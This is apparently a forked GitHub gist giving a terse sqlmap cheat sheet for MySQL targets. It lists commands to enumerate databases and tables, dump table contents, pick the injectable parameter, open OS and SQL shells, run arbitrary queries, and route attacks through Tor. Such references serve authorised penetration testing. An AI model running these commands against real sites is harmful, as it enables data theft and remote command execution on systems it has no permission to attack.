Skip to content

Instantly share code, notes, and snippets.

@ishan-marikar

ishan-marikar/sqlmap-cheat-sheet.md

Forked from jkullick/sqlmap-cheat-sheet.md
Created February 10, 2019 10:39
Show Gist options
  • Save ishan-marikar/ae6164a48a9e4d20b8b0b008ce81b2e6 to your computer and use it in GitHub Desktop.
Save ishan-marikar/ae6164a48a9e4d20b8b0b008ce81b2e6 to your computer and use it in GitHub Desktop.
Download ZIP
SQLMap Cheat Sheet
Raw
sqlmap-cheat-sheet.md 
# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs

# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables

# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump

# Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2

# Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1

# Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell

# Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell

# SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"

# Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment